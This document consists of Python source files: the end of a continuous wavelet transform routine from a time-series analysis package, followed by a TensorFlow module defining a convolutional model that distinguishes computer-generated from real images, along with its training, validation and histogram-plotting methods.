dj - the spacing between discrete scales.
s0 - the smallest scale of the wavelet
j1 - the number of scales minus one. Scales range from s0 up to s0 * 2^(j1*dj) to give a total of j1+1 scales.
k0 - parameter of Mother wavelet: Morlet - wavenumber, Paul - order, DOG - derivative
outputs:
wave - wavelet transform of the X. It is a complex numpy array of dim (n, j1+1)
period - the vector of Fourier periods in time units
scale - the vector of scale indices, given by s0 * 2^(j*dj)
coi - Cone-of-Influence, vector that contains a maximum period of useful information at particular time
"""
# map arguments
if 'dj' in kwargs:
dj = kwargs['dj']
else:
dj = 0.25
if 's0' in kwargs:
s0 = kwargs['s0']
else:
s0 = 2 * dt
if 'j1' in kwargs:
j1 = int(kwargs['j1'])
else:
# cast to int so j1 can be used with range() below
j1 = int(np.fix(np.log(len(X)*dt/s0) / np.log(2)) / dj)
if 'k0' in kwargs:
k0 = kwargs['k0']
else:
k0 = 6.
n1 = len(X)
Y = X - np.mean(X)
#Y = X
# padding, if needed
if pad:
base2 = int(np.fix(np.log(n1)/np.log(2) + 0.4999999)) # power of 2 nearest to len(X)
Y = np.concatenate( (Y, np.zeros((np.power(2, (base2+1))-n1))) )
n = len(Y)
# wavenumber array
k = np.arange(1, np.fix(n/2) + 1)
k *= (2. * np.pi) / (n * dt)
k_minus = -k[int(np.fix(n-1))//2 - 1::-1]
k = np.concatenate((np.array([0.]), k, k_minus))
# compute FFT of the (padded) time series
f = fft(Y)
# construct scale array and empty period & wave arrays
scale = np.array( [s0 * np.power(2, x*dj) for x in range(0,j1+1)] )
period = scale
wave = np.zeros((j1+1, n), dtype = complex)
# loop through scales and compute the transform
for i in range(j1+1):
daughter, fourier_factor, coi = wavelet(k, scale[i], k0)
wave[i, :] = ifft(f * daughter)
period = fourier_factor * scale
coi *= dt * np.concatenate( (np.array([1e-5]), np.arange(1,(n1)/2), np.arange((n1/2 - 1),0,-1), np.array([1e-5])) )
wave = wave[:, :n1]
return wave, period, scale, coi
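# Illustrative sketch (not part of the original file): a Morlet transform of
# a toy sine wave (dt, dj and the signal are made-up choices):
#
#   import numpy as np
#   t = np.arange(1024) * 0.25
#   x = np.sin(2 * np.pi * t / 16.0)
#   wave, period, scale, coi = continous_wavelet(x, dt = 0.25, pad = True, dj = 0.25)
#   power = np.abs(wave) ** 2   # (n_scales, n_times) wavelet power spectrum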
|
jajcayn/pyclits
|
pyclits/wavelet_analysis.py
|
Python
|
mit
| 5,336
|
[
"Gaussian"
] |
ca054f6b0aa39b328c6a451074e2d601b7552102007a12f620d717f7e781db6a
|
"""
The ``model`` module
======================
Contains the class Model which implements the core model for CG detection,
training, testing and visualization functions.
"""
import os
import time
import random
from . import image_loader as il
import tensorflow as tf
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import matplotlib.colors as mcolors
import csv
import configparser
import numpy as np
from PIL import Image
GPU = '/gpu:0'
config = 'server'
from sklearn.metrics import roc_curve
from sklearn.metrics import auc
from sklearn.metrics import accuracy_score as acc
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.svm import SVC
from sklearn.preprocessing import normalize
import pickle
# seed initialisation
print("\n random initialisation ...")
random_seed = int(time.time() % 10000 )
random.seed(random_seed) # for reproducibility
print(' random seed =', random_seed)
# tool functions
def variable_summaries(var):
"""Attach a lot of summaries to a Tensor (for TensorBoard visualization)."""
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.summary.scalar('mean', mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.summary.scalar('stddev', stddev)
tf.summary.scalar('max', tf.reduce_max(var))
tf.summary.scalar('min', tf.reduce_min(var))
tf.summary.histogram('histogram', var)
def image_summaries(var, name):
tf.summary.image(name + '_1', var[:,:,:,0:1], max_outputs = 1)
tf.summary.image(name + '_2', var[:,:,:,1:2], max_outputs = 1)
tf.summary.image(name + '_3', var[:,:,:,2:3], max_outputs = 1)
# tf.summary.image(name + '_4', var[:,:,:,3:4], max_outputs = 1)
# tf.summary.image(name + '_5', var[:,:,:,4:5], max_outputs = 1)
# tf.summary.image(name + '_6', var[:,:,:,5:6], max_outputs = 1)
# tf.summary.image(name + '_7', var[:,:,:,6:7], max_outputs = 1)
# tf.summary.image(name + '_8', var[:,:,:,7:8], max_outputs = 1)
def filter_summary(filters, name):
tf.summary.image(name + '_1', tf.stack([filters[:,:,0,0:1]]), max_outputs = 1)
tf.summary.image(name + '_2', tf.stack([filters[:,:,0,1:2]]), max_outputs = 1)
tf.summary.image(name + '_3', tf.stack([filters[:,:,0,2:3]]), max_outputs = 1)
tf.summary.image(name + '_4', tf.stack([filters[:,:,0,3:4]]), max_outputs = 1)
tf.summary.image(name + '_5', tf.stack([filters[:,:,0,4:5]]), max_outputs = 1)
tf.summary.image(name + '_6', tf.stack([filters[:,:,0,5:6]]), max_outputs = 1)
# tf.summary.image(name + '_7', tf.stack([filters[:,:,0,6:7]]), max_outputs = 1)
# tf.summary.image(name + '_8', tf.stack([filters[:,:,0,7:8]]), max_outputs = 1)
def weight_variable(shape, nb_input, seed = None):
"""Creates and initializes (truncated normal distribution) a variable weight Tensor with a defined shape"""
sigma = np.sqrt(2/nb_input)
# print(sigma)
# NOTE: the `seed` parameter is ignored; the module-level random_seed is used
initial = tf.truncated_normal(shape, stddev=sigma, seed = random_seed)
return tf.Variable(initial)
def bias_variable(shape):
"""Creates and initializes (truncated normal distribution with 0.5 mean) a variable bias Tensor with a defined shape"""
initial = tf.truncated_normal(shape, mean = 0.5, stddev=0.1, seed = random_seed)
return tf.Variable(initial)
def conv2d(x, W):
"""Returns the 2D convolution between input x and the kernel W"""
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
"""Returns the result of max-pooling on input x with a 2x2 window"""
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def avg_pool_2x2(x):
"""Returns the result of average-pooling on input x with a 2x2 window"""
return tf.nn.avg_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def max_pool_10x10(x):
"""Returns the result of max-pooling on input x with a 10x10 window"""
return tf.nn.max_pool(x, ksize=[1, 10, 10, 1],
strides=[1, 10, 10, 1], padding='SAME')
def avg_pool_10x10(x):
"""Returns the result of average-pooling on input x with a 10x10 window"""
return tf.nn.avg_pool(x, ksize=[1, 10, 10, 1],
strides=[1, 10, 10, 1], padding='SAME')
def histogram(x, nbins):
"""Returns the Tensor containing the nbins values of the normalized histogram of x"""
h = tf.histogram_fixed_width(x, value_range = [-1.0,1.0],
nbins = nbins, dtype = tf.float32)
return(h)
def gaussian_func(mu, x, n, sigma):
"""Returns the average of x composed with a gaussian function
:param mu: The mean of the gaussian function
:param x: Input values
:param n: Number of input values
:param sigma: Variance of the gaussian function
:type mu: float
:type x: Tensor
:type n: int
:type sigma: float
"""
gauss = tf.contrib.distributions.Normal(mu=mu, sigma=sigma)
# return(tf.reduce_sum(gauss.pdf(xmax - tf.nn.relu(xmax - x))/n))
return(tf.reduce_sum(gauss.pdf(x)/n))
def gaussian_kernel(x, nbins = 8, values_range = [0, 1], sigma = 0.1,image_size = 100):
"""Returns the values of x's nbins gaussian histogram
:param x: Input values (supposed to be images)
:param nbins: Number of bins (different gaussian kernels)
:param values_range: The range of the x values
:param sigma: Variance of the gaussian functions
:param image_size: The size of the images x (for normalization)
:type x: Tensor
:type nbins: int
:type values_range: table
:type sigma: float
:type image_size: int
"""
mu_list = np.float32(np.linspace(values_range[0], values_range[1], nbins + 1))
n = np.float32(image_size**2)
function_to_map = lambda m : gaussian_func(m, x, n, sigma)
return(tf.map_fn(function_to_map, mu_list))
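# Illustrative sketch (not part of the original file): unlike the hard
# histogram() above, gaussian_kernel is differentiable, so gradients can flow
# through it during training. Assuming a 100x100 single-channel image tensor:
#
#   img = tf.placeholder(tf.float32, [100, 100])
#   h = gaussian_kernel(img, nbins = 8, values_range = [0, 1], sigma = 0.1)
#   # h has shape [9]: one gaussian-weighted count per linspace bin center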
def plot_gaussian_kernel(nbins = 8, values_range = [0, 1], sigma = 0.1):
"""Plots the gaussian kernels used for estimating the histogram"""
# use the same bin centers as gaussian_kernel (linspace over the range)
mu_list = list(np.linspace(values_range[0], values_range[1], nbins + 1))
range_plot = np.linspace(values_range[0]-0.1, values_range[1]+0.1, 1000)
plt.figure()
for mu in mu_list:
plt.plot(range_plot, np.exp(-(range_plot-mu)**2/(sigma**2)))
plt.title("Gaussian kernels used for estimating the histograms")
plt.show()
def classic_histogram_gaussian(x, k, nbins = 8, values_range = [0, 1], sigma = 0.6):
"""Computes gaussian histogram values for k input images"""
function_to_map = lambda y: tf.stack([gaussian_kernel(y[:,:,i], nbins, values_range, sigma) for i in range(k)])
res = tf.map_fn(function_to_map, x)
return(res)
def stat(x):
"""Computes statistical features for an image x : mean, min, max and variance"""
# sigma = tf.reduce_mean((x - tf.reduce_mean(x))**2)
return(tf.stack([tf.reduce_mean(x), tf.reduce_min(x), tf.reduce_max(x), tf.reduce_mean((x - tf.reduce_mean(x))**2)]))
def compute_stat(x, k):
"""Computes statistical features for k images"""
# function_to_map = lambda y: tf.stack([stat(y[:,:,i]) for i in range(k)])
# res = tf.map_fn(function_to_map, x)
res = tf.transpose(tf.stack([tf.reduce_mean(x, axis=[1,2]),
tf.reduce_min(x, axis=[1,2]),
tf.reduce_max(x, axis=[1,2]),
tf.reduce_mean((x - tf.reduce_mean(x, axis=[1,2], keep_dims = True))**2, axis=[1,2])]),
[1,2,0])
return(res)
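# Illustrative sketch (assumption, not original code): per feature map,
# compute_stat extracts [mean, min, max, variance] over the spatial axes.
# For a single map m of shape (H, W) the NumPy equivalent would be:
#
# feats = np.array([m.mean(), m.min(), m.max(), ((m - m.mean())**2).mean()])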
class Model:
"""
Class Model
======================
Defines a model for single-image CG detection and numerous methods to :
- Create the TensorFlow graph of the model
- Train the model on a specific database
- Reload past weights
- Test the model (simple classification, full-size images with boosting and splicing)
- Visualize some images and probability maps
"""
def __init__(self, database_path, image_size, config = 'Personal', filters = [32, 64],
feature_extractor = 'Stats', remove_context = False,
nbins = 10, remove_filter_size = 3, batch_size = 50,
using_GPU = False, only_green = True):
"""Defines a model for single-image classification
:param database_path: Absolute path to the default patch database (training, validation and testings are performed on this database)
:param image_size: Size of the patches supposed squared
:param config: Name of the section to use in the config.ini file for configuring directory paths (weights, training summaries and visualization dumping)
:param filters: Table with the number of output filters of each layer
:param feature_extractor: Two choices 'Stats' or 'Hist' for the feature extractor
:param nbins: Number of bins on the histograms. Used only if the feature_extractor parameter is 'Hist'
:param batch_size: The size of the batch for training
:param using_GPU: Whether to use GPU for computation or not
:type database_path: str
:type image_size: int
:type config: str
:type filters: table
:type feature_extractor: str
:type nbins: int
:type batch_size: int
:type using_GPU: bool
"""
clear = lambda: os.system('clear')
clear()
print(' TensorFlow version: ', tf.__version__)
# read the configuration file
conf = configparser.ConfigParser()
conf.read('config.ini')
if config not in conf:
raise ValueError(config + ' is not in the config.ini file... Please create the corresponding section')
self.dir_ckpt = conf[config]['dir_ckpt']
self.dir_summaries = conf[config]['dir_summaries']
self.dir_visualization = conf[config]['dir_visualization']
print(' Check-points directory : ' + self.dir_ckpt)
print(' Summaries directory : ' + self.dir_summaries)
print(' Visualizations directory : ' + self.dir_visualization)
# setting the parameters of the model
self.nf = filters
self.nl = len(self.nf)
self.filter_size = 3
self.feature_extractor = feature_extractor # use the constructor argument (was hard-coded to 'Stats')
if self.feature_extractor != 'Stats' and self.feature_extractor != 'Hist':
raise ValueError('''Feature extractor must be 'Stats' or 'Hist' ''')
self.database_path = database_path
self.image_size = image_size
self.batch_size = batch_size
self.nbins = nbins
self.using_GPU = using_GPU
self.remove_context = remove_context
self.remove_filter_size = remove_filter_size
self.only_green = only_green
# getting the database
self.import_database()
self.nb_channels = self.data.nb_channels
# create the TensorFlow graph
if using_GPU:
with tf.device(GPU):
self.create_graph(nb_class = self.nb_class,
feature_extractor = self.feature_extractor,
nl = self.nl, nf = self.nf, filter_size = self.filter_size)
else:
self.create_graph(nb_class = self.nb_class,
feature_extractor = self.feature_extractor,
nl = self.nl, nf = self.nf, filter_size = self.filter_size)
def import_database(self):
"""Creates a Database_loader to load images from the distant database"""
# load data
print(' import data : image_size = ' +
str(self.image_size) + 'x' + str(self.image_size) + '...')
self.data = il.Database_loader(self.database_path, self.image_size,
proportion = 1, only_green=self.only_green)
self.nb_class = self.data.nb_class
def create_graph(self, nb_class, nl = 2, nf = [32, 64], filter_size = 3,
feature_extractor = 'Stats'):
"""Creates the TensorFlow graph"""
print(' create model ...')
# input layer. One entry is a float size x size, nb_channels image.
# None means that the batch can contain any number of such images.
if feature_extractor == 'Hist':
print(' Model with histograms.')
else:
print(' Model with statistics.')
graph = tf.Graph()
with graph.as_default():
with tf.name_scope('Input_Data'):
x = tf.placeholder(tf.float32, [None, self.image_size, self.image_size, self.nb_channels])
self.x = x
# reshape the input data:
x_image = tf.reshape(x, [-1,self.image_size, self.image_size, self.nb_channels])
with tf.name_scope('Image_Visualization'):
tf.summary.image('Input_Data', x_image)
# first conv net layer
if self.remove_context:
print(' Creating layer 1 - Shape : ' + str(self.remove_filter_size) + 'x' +
str(self.remove_filter_size) + 'x' + str(self.nb_channels) + 'x' + str(nf[0]))
else:
print(' Creating layer 1 - Shape : ' + str(self.filter_size) + 'x' +
str(self.filter_size) + 'x' + str(self.nb_channels) + 'x' + str(nf[0]))
with tf.name_scope('Conv1'):
with tf.name_scope('Weights'):
if self.remove_context:
W_conv1 = weight_variable([self.remove_filter_size, self.remove_filter_size, self.nb_channels, nf[0]],
nb_input = self.remove_filter_size*self.remove_filter_size*self.nb_channels,
seed = random_seed)
else:
W_conv1 = weight_variable([self.filter_size, self.filter_size, self.nb_channels, nf[0]],
nb_input = self.filter_size*self.filter_size*self.nb_channels,
seed = random_seed)
self.W_conv1 = W_conv1
with tf.name_scope('Bias'):
b_conv1 = bias_variable([nf[0]])
# relu on the conv layer
if self.remove_context:
h_conv1 = conv2d(x_image, W_conv1)
else:
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1,
name = 'Activated_1')
self.h_conv1 = h_conv1
self.W_convs = [W_conv1]
self.b_convs = [b_conv1]
self.h_convs = [h_conv1]
image_summaries(self.h_convs[0], 'hconv1')
filter_summary(self.W_convs[0], 'Wconv1')
for i in range(1, nl):
print(' Creating layer ' + str(i+1) + ' - Shape : ' + str(self.filter_size) + 'x' +
str(self.filter_size) + 'x' + str(nf[i-1]) + 'x' + str(nf[i]))
# other conv
with tf.name_scope('Conv' + str(i+1)):
with tf.name_scope('Weights'):
W_conv2 = weight_variable([self.filter_size, self.filter_size, nf[i-1], nf[i]],
self.filter_size*self.filter_size*nf[i-1])
self.W_convs.append(W_conv2)
with tf.name_scope('Bias'):
b_conv2 = bias_variable([nf[i]])
self.b_convs.append(b_conv2)
h_conv2 = tf.nn.relu(conv2d(self.h_convs[i-1], W_conv2) + b_conv2,
name = 'Activated_2')
self.h_convs.append(h_conv2)
print(' Creating feature extraction layer')
nb_filters = nf[nl-1]
if self.feature_extractor == 'Hist':
# Histograms
nbins = self.nbins
size_flat = (nbins + 1)*nb_filters
range_hist = [0,1]
sigma = 0.07
# plot_gaussian_kernel(nbins = nbins, values_range = range_hist, sigma = sigma)
with tf.name_scope('Gaussian_Histogram'):
hist = classic_histogram_gaussian(self.h_convs[nl-1], k = nb_filters,
nbins = nbins,
values_range = range_hist,
sigma = sigma)
self.hist = hist
flatten = tf.reshape(hist, [-1, size_flat], name = "Flatten_Hist")
self.flatten = flatten
else:
nb_stats = 4
size_flat = nb_filters*nb_stats
with tf.name_scope('Simple_statistics'):
s = compute_stat(self.h_convs[nl-1], nb_filters)
self.stat = s
flatten = tf.reshape(s, [-1, size_flat], name = "Flattened_Stat")
self.flatten = flatten
print(' Creating MLP ')
# Densely Connected Layer
# we add a fully-connected layer with 1024 neurons
with tf.variable_scope('Dense1'):
with tf.name_scope('Weights'):
W_fc1 = weight_variable([size_flat, 1024],
nb_input = size_flat)
with tf.name_scope('Bias'):
b_fc1 = bias_variable([1024])
# put a relu
h_fc1 = tf.nn.relu(tf.matmul(flatten, W_fc1) + b_fc1,
name = 'activated')
# dropout
with tf.name_scope('Dropout1'):
keep_prob = tf.placeholder(tf.float32)
self.keep_prob = keep_prob
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
self.h_fc1 = h_fc1
# readout layer
with tf.variable_scope('Readout'):
with tf.name_scope('Weights'):
W_fc3 = weight_variable([1024, nb_class],
nb_input = 1024)
with tf.name_scope('Bias'):
b_fc3 = bias_variable([nb_class])
y_conv = tf.matmul(h_fc1_drop, W_fc3) + b_fc3
self.y_conv = y_conv
# support for the learning label
y_ = tf.placeholder(tf.float32, [None, nb_class])
self.y_ = y_
# Define loss (cost) function and optimizer
print(' setup loss function and optimizer ...')
# softmax to have normalized class probabilities + cross-entropy
with tf.name_scope('cross_entropy'):
softmax_cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels = y_, logits = y_conv)
with tf.name_scope('total'):
cross_entropy_mean = tf.reduce_mean(softmax_cross_entropy)
tf.summary.scalar('cross_entropy', cross_entropy_mean)
with tf.name_scope('train'):
train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy_mean)
# with tf.name_scope('enforce_constraints'):
if self.remove_context:
# self.zero_op = tf.assign(ref = self.W_convs[0][1,1,0,:], value = tf.zeros([nf[0]]))
center = int(self.remove_filter_size/2)
self.zero_op = tf.scatter_nd_update(ref = self.W_convs[0], indices = tf.constant([[center,center,0,i] for i in range(nf[0])]), updates = tf.zeros(nf[0]))
self.norm_op = tf.assign(ref = self.W_convs[0], value = tf.divide(self.W_convs[0],tf.reduce_sum(self.W_convs[0], axis = 3, keep_dims = True)))
self.minus_one_op = tf.scatter_nd_update(ref = self.W_convs[0], indices = tf.constant([[center,center,0,i] for i in range(nf[0])]), updates = tf.constant([-1.0 for i in range(nf[0])]))
self.norm = tf.reduce_sum(self.W_convs[0], axis = 3, keep_dims = True)
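# Added note (interpretation, hedged): the three ops above enforce a
# constrained first layer reminiscent of prediction-error filters. After each
# training step the center tap of every first-layer kernel is zeroed, the
# weights are rescaled by their sum (taken here over axis 3, the output-filter
# axis, though the spatial axes may have been intended), and the center tap is
# then set to -1, so each filter roughly outputs the difference between a
# pixel and a prediction formed from its neighbourhood.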
self.train_step = train_step
print(' test ...')
# 'correct_prediction' compares predicted and true classes: argmax over axis 1 gives the class index
correct_prediction = tf.equal(tf.argmax(y_conv,1), tf.argmax(y_,1))
# 'accuracy' casts the boolean predictions to float and averages them
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.summary.scalar('accuracy', accuracy)
self.accuracy = accuracy
self.graph = graph
print(' model created.')
def validation_testing(self, it, nb_iterations = 20, batch_size = 50,
plot_histograms = False, range_hist = [0.,1.],
selected_hist_nb = 8, run_name = '',
show_filters = True):
"""Computes validation accuracy during training and plots some visualization.
Returns the accuracy on the validation data. Can also plot some histograms of the filtered images
(if the Hist layer is selected) and the first layer's filters.
:param it: The number of the iteration in the training process
:param nb_iterations: The number of batches to process on the validation set
:param batch_size: Batch size when loading the validation images
:param plot_histograms: Whether to plot the histograms or not
:param range_hist: The value range for plotting the histograms
:param selected_hist_nb: The number of histograms to plot
:param run_name: The name of the training run
:param show_filters: Whether to show the first layer's filters
:type it: int
:type nb_iterations: int
:type batch_size: int
:type plot_histograms: bool
:type range_hist: table
:type selected_hist_nb: int
:type run_name: str
:type show_filters: bool
"""
if show_filters:
nb_height = 4
nb_width = int(self.nf[0]/nb_height)
img, axes = plt.subplots(nrows = nb_width, ncols = nb_height)
gs1 = gridspec.GridSpec(nb_height, nb_width)
for i in range(self.nf[0]):
ax1 = plt.subplot(gs1[i])
ax1.axis('off')
im = plt.imshow(self.W_conv1[:,:,0,i].eval(), cmap = 'jet', vmin = -5, vmax = 5)
ax1.set_xticklabels([])
ax1.set_yticklabels([])
ax1.autoscale(False)
ax1.set_adjustable('box-forced')
# axes.get_yaxis().set_ticks([])
# plt.ylabel('Kernel ' + str(i), fontsize = 5.0)
# ax1.set_ylabel('Kernel ' + str(i), fontsize = 5.0)
ax1.set_title("Filter " + str(i + 1), fontsize = 12.0)
img.subplots_adjust(wspace = 0.1, hspace = 0.6, right = 0.7)
cbar_ax = img.add_axes([0.75, 0.15, 0.03, 0.7])
cbar = img.colorbar(im, ticks=[-5, 0, 5], cax=cbar_ax)
cbar.ax.set_yticklabels(['< -5', '0', '> 5'])
plt.show(img)
plt.close()
if plot_histograms and self.feature_extractor != 'Hist':
print("Can't plot the histograms, feature extractor is 'Stats'...")
validation_batch_size = batch_size
validation_accuracy = 0
# validation_auc = 0
self.data.validation_iterator = 0
if plot_histograms:
nb_CGG = 0
hist_CGG = [np.zeros((self.nbins+1,)) for i in range(selected_hist_nb)]
nb_real = 0
hist_real = [np.zeros((self.nbins+1,)) for i in range(selected_hist_nb)]
for _ in range( nb_iterations ) :
batch_validation = self.data.get_batch_validation(batch_size=validation_batch_size,
crop = False,
random_flip_flop = True,
random_rotate = True)
feed_dict = {self.x: batch_validation[0],
self.y_: batch_validation[1],
self.keep_prob: 1.0}
validation_accuracy += self.accuracy.eval(feed_dict)
if plot_histograms and self.feature_extractor == 'Hist':
# Computing the mean histogram for each class
hist_plot = self.hist.eval(feed_dict)
for k in range(validation_batch_size):
if batch_validation[1][k][0] == 1.:
nb_real +=1
is_real = True
else:
nb_CGG += 1
is_real = False
for j in range(selected_hist_nb):
for l in range(self.nbins+1):
if is_real:
hist_real[j][l] += hist_plot[k,j,l]
else:
hist_CGG[j][l] += hist_plot[k,j,l]
for p in range(selected_hist_nb):
hist_CGG[p] /= nb_CGG
hist_real[p] /= nb_real
if plot_histograms and self.feature_extractor == 'Hist':
# Plotting mean histogram for CGG
fig = plt.figure(1)
for k in range(selected_hist_nb):
plt.subplot(selected_hist_nb//2, 2, k+1)
plt.bar(np.linspace(range_hist[0], range_hist[1], self.nbins+1),
hist_CGG[k], width = 1/(self.nbins + 1))
plt.plot(np.linspace(range_hist[0], range_hist[1], self.nbins+1),
hist_CGG[k], 'r')
fig.suptitle("Mean histogram for CGG", fontsize=14)
plt.show()
plt.close()
# Plotting mean histogram for Real
fig = plt.figure(2)
for k in range(selected_hist_nb):
plt.subplot(selected_hist_nb//2, 2, k+1)
plt.bar(np.linspace(range_hist[0], range_hist[1], self.nbins+1),
hist_real[k], width = 1/(self.nbins + 1))
plt.plot(np.linspace(range_hist[0], range_hist[1],self.nbins+1),
hist_real[k], 'r')
fig.suptitle("Mean histogram for Real", fontsize=14)
plt.show()
plt.close()
validation_accuracy /= nb_iterations
print(" step %d, training accuracy %g (%d validations tests)"%(it, validation_accuracy, validation_batch_size*nb_iterations))
return(validation_accuracy)
def train(self, nb_train_batch, nb_test_batch,
nb_validation_batch, validation_frequency = 10, show_filters = False):
"""Trains the model on the selected database training set.
Trains a blank single-image classifier (or one initialized with pre-trained weights).
The weights are saved to the corresponding file during training; validation accuracy is computed,
shown and saved at the end. Finally, summaries are generated.
Testing is also performed for single images.
:param nb_train_batch: The number of batches to train (can be on multiple epochs)
:param nb_test_batch: The number of batches to test
:param nb_validation_batch: The number of batch for validation
:param validation_frequency: Performs validation testing every validation_frequency batches
:param show_filters: Whether to show the first layer's filters at each validation step
:type nb_train_batch: int
:type nb_test_batch: int
:type nb_validation_batch: int
:type validation_frequency: int
:type show_filters: bool
"""
run_name = input(" Choose a name for the run : ")
path_save = self.dir_ckpt + run_name
acc_name = self.dir_summaries + run_name + "/validation_accuracy_" + run_name + ".csv"
# computation time tick
start_clock = time.clock()
start_time = time.time()
batch_clock = None
# start a session
print(' start session ...')
with tf.Session(graph=self.graph, config=tf.ConfigProto(log_device_placement=self.using_GPU)) as sess:
merged = tf.summary.merge_all()
if not os.path.exists(self.dir_summaries + run_name):
os.mkdir(self.dir_summaries + run_name)
train_writer = tf.summary.FileWriter(self.dir_summaries + run_name,
sess.graph)
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
saver = tf.train.Saver()
print(' variable initialization ...')
restore_weights = input("\nRestore weights from a previous session? (y/N) : ")
if restore_weights == 'y':
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
print('\n Model restored\n')
# Train
print(' train ...')
start_clock = time.clock()
start_time = time.time()
validation_accuracy = []
for i in range(nb_train_batch):
# enforce constraints on first layer :
if self.remove_context:
sess.run(self.zero_op)
sess.run(self.norm_op)
sess.run(self.minus_one_op)
print(self.W_conv1.eval()[:,:,0,0])
# print(self.W_conv1.eval()[:,:,0,0])
# every validation_frequency batches, test the accuracy
if i%validation_frequency == 0 :
# both branches of the original condition were identical; histogram plotting stays disabled
plot_histograms = False
v = self.validation_testing(i, nb_iterations = nb_validation_batch,
batch_size = self.batch_size,
plot_histograms = plot_histograms,
run_name = run_name,
show_filters = show_filters)
validation_accuracy.append(v)
# regular training
batch = self.data.get_next_train_batch(self.batch_size, False, True, True)
feed_dict = {self.x: batch[0], self.y_: batch[1], self.keep_prob: 0.65}
summary, _ = sess.run([merged, self.train_step], feed_dict = feed_dict)
train_writer.add_summary(summary, i)
# Saving weights every 100 batches
if i%100 == 0:
path_save_batch = path_save + str(i) + ".ckpt"
print(' saving weights in file : ' + path_save_batch)
saver.save(sess, path_save_batch)
print(' OK')
if batch_clock is not None:
time_elapsed = (time.time()-batch_clock)
print(' Time for last 100 batches : ', time.strftime("%H:%M:%S",time.gmtime(time_elapsed)))
remaining_time = time_elapsed * int((nb_train_batch - i)/100)
print(' Remaining time : ', time.strftime("%H:%M:%S",time.gmtime(remaining_time)))
batch_clock = time.time()
print(' saving validation accuracy...')
file = open(acc_name, 'w', newline='')
try:
writer = csv.writer(file)
for v in validation_accuracy:
writer.writerow([str(v)])
finally:
file.close()
print(' done.')
# final test
print(' final test ...')
test_accuracy = 0
# test_auc = 0
nb_iterations = nb_test_batch
self.data.test_iterator = 0
scores = np.zeros([nb_test_batch*self.batch_size,])
y_test = np.zeros([nb_test_batch*self.batch_size,])
for k in range( nb_iterations ) :
batch_test = self.data.get_batch_test(self.batch_size, False, True, True)
feed_dict = {self.x:batch_test[0], self.y_: batch_test[1], self.keep_prob: 1.0}
test_accuracy += self.accuracy.eval(feed_dict)
# print(scores[k*self.batch_size:(k+1)*self.batch_size].shape)
scores[k*self.batch_size:(k+1)*self.batch_size] = normalize(self.y_conv.eval(feed_dict))[:,1]
y_test[k*self.batch_size:(k+1)*self.batch_size] = batch_test[1][:,1]
# test_auc += sess.run(auc, feed_dict)[0]
test_accuracy /= nb_iterations
print(" test accuracy %g"%test_accuracy)
fpr, tpr, _ = roc_curve(y_test, scores)
filename = '/home/smg/v-nicolas/ROC/' + run_name + '.pkl'
print('Saving tpr and fpr in file : ' + filename)
pickle.dump((fpr, tpr), open(filename, 'wb'))
# test_auc /= (nb_iterations - 1)
# print(" test AUC %g"%test_auc)
if nb_train_batch > validation_frequency:
plt.figure()
plt.plot(np.linspace(0, nb_train_batch, len(validation_accuracy)), validation_accuracy)
plt.title("Validation accuracy during training")
plt.xlabel("Training batch")
plt.ylabel("Validation accuracy")
plt.show()
plt.close()
# done
print(" computation time (cpu) :",time.strftime("%H:%M:%S", time.gmtime(time.clock()-start_clock)))
print(" computation time (real):",time.strftime("%H:%M:%S", time.gmtime(time.time()-start_time)))
print(' done.')
def show_histogram(self):
"""Plots histograms of the last layer outputs for some images"""
with tf.Session(graph=self.graph) as sess:
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
saver = tf.train.Saver()
print(' variable initialization ...')
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
print('\n Model restored\n')
batch = self.data.get_next_train_batch(self.batch_size, False, True, True)
feed_dict = {self.x: batch[0], self.y_: batch[1], self.keep_prob: 1.0}
conv = self.h_convs[-1].eval(feed_dict = feed_dict) # self.h_conv2 was never defined; use the last stored conv activation
for i in range(self.batch_size):
plt.figure()
plt.hist(np.reshape(conv[i,:,:,0], (self.image_size*self.image_size,)))
plt.show()
def mean_histogram(self, nb_images = 5000):
print(" Showing the histograms of filtered images...")
with tf.Session(graph=self.graph) as sess:
tf.global_variables_initializer().run()
tf.local_variables_initializer().run()
saver = tf.train.Saver()
print(' variable initialization ...')
file_to_restore = input("\nName of the file to restore (Directory : " +
self.dir_ckpt + ') : ')
saver.restore(sess, self.dir_ckpt + file_to_restore)
print('\n Model restored\n')
j = 0
nreal = 0
ncgg = 0
while j < nb_images:
batch = self.data.get_next_train_batch(self.batch_size, False, True, True)
feed_dict = {self.x: batch[0], self.y_: batch[1], self.keep_prob: 1.0}
conv = self.h_conv1.eval(feed_dict = feed_dict)
nbins = 150
hist_values_CGG = np.zeros((nbins,))
hist_values_Real = np.zeros((nbins,))
for i in range(self.batch_size):
if batch[1][i][0] == 1:
# print(conv[i,:,:,15])
hist_values_Real += np.histogram(conv[i,:,:,1], bins = nbins, range = (0., 1.))[0]
nreal += 1
else:
# print(conv[i,:,:,15])
hist_values_CGG += np.histogram(conv[i,:,:,1], bins = nbins, range = (0., 1.))[0]
ncgg += 1
j+= self.batch_size
hist_values_CGG /= ncgg
hist_values_Real /= nreal
plt.figure()
plt.plot(np.linspace(0,1, nbins), hist_values_Real, color = 'b',
label = 'Real')
plt.plot(np.linspace(0,1, nbins), hist_values_CGG, color = 'r',
label = 'CGG')
plt.legend()
plt.show()
def lda_training(self, nb_train_batch, nb_test_batch):
"""Trains a LDA classifier on top of the feature extractor.
